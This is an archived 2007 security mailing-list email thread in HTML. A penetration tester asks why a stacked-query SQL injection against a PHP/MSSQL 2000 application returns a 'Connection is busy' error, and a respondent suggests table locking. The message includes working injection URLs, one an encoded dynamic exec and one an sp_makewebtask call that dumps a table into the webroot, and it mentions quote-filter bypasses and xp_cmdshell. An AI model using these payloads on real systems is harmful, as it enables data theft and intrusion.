<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<STYLE type=text/css>DIV {
MARGIN: 0px
}
</STYLE>
<META content="MSHTML 6.00.5730.11" name=GENERATOR></HEAD>
<BODY>
<DIV dir=ltr align=left><SPAN class=906522521-18102007><FONT face=Arial
color=#0000ff size=2>I am more familiar with MySQL, but could there be a case
that the database/application is locking the table during the first stored
procedure run? If it doesn't properly unlock the table after its finished
(assuming your injection would have to make sure that happens) then it can
essentially block the server from allowing access to that table
again.</FONT></SPAN></DIV>
<DIV dir=ltr align=left><SPAN class=906522521-18102007><FONT face=Arial
color=#0000ff size=2></FONT></SPAN> </DIV>
<DIV dir=ltr align=left><SPAN class=906522521-18102007><FONT face=Arial
color=#0000ff size=2>I would check the source to see what they are doing for
locking, I might totally be out to lunch, but I have seen lots of PHP apps
improperly lock and unlock causing all sorts of bizarres
problems.</FONT></SPAN></DIV>
<DIV dir=ltr align=left><SPAN class=906522521-18102007><FONT face=Arial
color=#0000ff size=2></FONT></SPAN> </DIV>
<DIV dir=ltr align=left><SPAN class=906522521-18102007><FONT face=Arial
color=#0000ff size=2>JS</FONT></SPAN></DIV><BR>
<BLOCKQUOTE
style="PADDING-LEFT: 5px; MARGIN-LEFT: 5px; BORDER-LEFT: #0000ff 2px solid; MARGIN-RIGHT: 0px">
<DIV class=OutlookMessageHeader lang=en-us dir=ltr align=left>
<HR tabIndex=-1>
<FONT face=Tahoma size=2><B>From:</B> dailydave-bounces@lists.immunitysec.com
[mailto:dailydave-bounces@lists.immunitysec.com] <B>On Behalf Of </B>H. Daniel
Regalado Arias<BR><B>Sent:</B> Thursday, October 18, 2007 1:00
PM<BR><B>To:</B> Dave Aitel; dailydave<BR><B>Subject:</B> [Dailydave] SQL
Injection - Strange Result<BR></FONT><BR></DIV>
<DIV></DIV>
<DIV
style="FONT-SIZE: 12pt; FONT-FAMILY: times new roman, new york, times, serif">Hi
Dave and Friends, i have a problem while making a PHP -MSQQL-2000 Web App
Assessment, after many days and due to the lack of experience i am able to
bypass single quotes using char() or "[]" when trying to execute a store
procedure, so, by now, i am able to inject code directly to the DataBase
without being filtered but after sending the next test: <BR><BR><SPAN><A
href="http://www.client.com/mod.php?id=1;begin%20declare%20@q%20varchar%288000%29select%20@q%20=%200x73656c65637420404076657273696f6e%20exec%28@q%29%20end"
target=_blank>http://www.client.com/mod.php?id=1;begin%20declare%20@q%20varchar(8000)select%20@q%20=%200x73656c65637420404076657273696f6e%20exec(@q)%20end</A>;--</SPAN><BR><BR>or
another store procedure like:<BR><BR><SPAN><A
href="http://www.client.com/mod.php?id=1;exec%20sp_makewebtask%20%5Bc:%5Cinetpub%5Cwwwroot%5Csssssssss%5Cindex_olld.html%5D,%20%5Bselect%20*%20from%20TABLE%5D"
target=_blank>http://www.client.com/mod.php?id=1;exec%20sp_makewebtask%20%5Bc:\inetpub\wwwroot\sssssssss\index_olld.html%5D,%20%5Bselect%20*%20from%20TABLE%5D</A>;--</SPAN><BR><BR>the
application responses with something like:<BR>SQL error: [Microsoft][ODBC SQL
Server Driver]Connection is busy with results for another hstmt, SQL state
S1000 in SQLExecDirect in <B>C:\D\Inetpub\wwwroot\sssssssssss</B><BR>
<DIV><BR>I think its because of the first query (the one belongs to id=1
parameter, even though 1 results to 0 rows).<BR>I have ridden a lot of sql
injection .. Advanced, More, and so on, but all of them always execute a store
procedure after a semicolon but no one says something about this
error.<BR><BR>I thought to put a delay before my store procedure or a command
to free the data base connection handler.<BR><BR>What you think???<BR><BR>By
the way, i am not able to run xp_cmdshell because of the database user
permissions, may be i could try to elevate privileges but always appears the
error describe above.<BR><BR>Thanks in Advance.<BR> </DIV>H. Daniel
Regalado Arias, CISSP<BR>Chief Information Security Officer<BR>Macula Security
Consulting Group<BR>www.macula-group.com
<DIV
style="FONT-SIZE: 12pt; FONT-FAMILY: times new roman,new york,times,serif"><BR><BR>
<DIV
style="FONT-SIZE: 12pt; FONT-FAMILY: times new roman,new york,times,serif">-----
Mensaje original ----<BR>De: Dave Aitel <dave@immunityinc.com><BR>Para:
dailydave <dailydave@lists.immunitysec.com><BR>Enviado: jueves, 18 de
octubre, 2007 12:40:06<BR>Asunto: [Dailydave] SQL Hooker
Release<BR><BR>-----BEGIN PGP SIGNED MESSAGE-----<BR>Hash: SHA1<BR><BR><A
href="http://forum.immunityinc.com/index.php?topic=92.0"
target=_blank>http://forum.immunityinc.com/index.php?topic=92.0</A><BR><BR>JMS
and I decided to put our code where our mouth was.<BR><BR>It looks a lot like
this:<BR>PyCommands $ python sql_listener.py 80812.4<BR>Set up XMLRPC Socket
on 0.0.0.0 port 8081<BR>select count(*) from users where userName='cow' and
userPass='boy'<BR>10.10.10.243 - - [18/Oct/2007 13:03:17] "POST / HTTP/1.0"
200 -<BR><BR>Next up - file operation hooking perhaps? :><BR><BR>-
-dave<BR>-----BEGIN PGP SIGNATURE-----<BR>Version: GnuPG v1.4.6
(GNU/Linux)<BR><BR>iD8DBQFHF5p0B8JNm+PA+iURAtFlAKDhW3CVqVd6S621t4kdsQ1Y0sb2cgCg7JY5<BR>QaZkG+j3E5b6NO0SJrR3yM8=<BR>=bvnS<BR>-----END
PGP
SIGNATURE-----<BR><BR>_______________________________________________<BR>Dailydave
mailing list<BR><A href="mailto:Dailydave@lists.immunitysec.com"
ymailto="mailto:Dailydave@lists.immunitysec.com">Dailydave@lists.immunitysec.com</A><BR><A
href="http://lists.immunitysec.com/mailman/listinfo/dailydave"
target=_blank>http://lists.immunitysec.com/mailman/listinfo/dailydave</A><BR></DIV><BR></DIV></DIV><BR>
<HR SIZE=1>
<BR><FONT face=Verdana size=-2>¡Sé un mejor ambientalista!<BR>Encuentra
consejos para cuidar el lugar donde vivimos
en:<BR>http://telemundo.yahoo.com/promos/mejorambientalista.html</FONT></BLOCKQUOTE></BODY></HTML>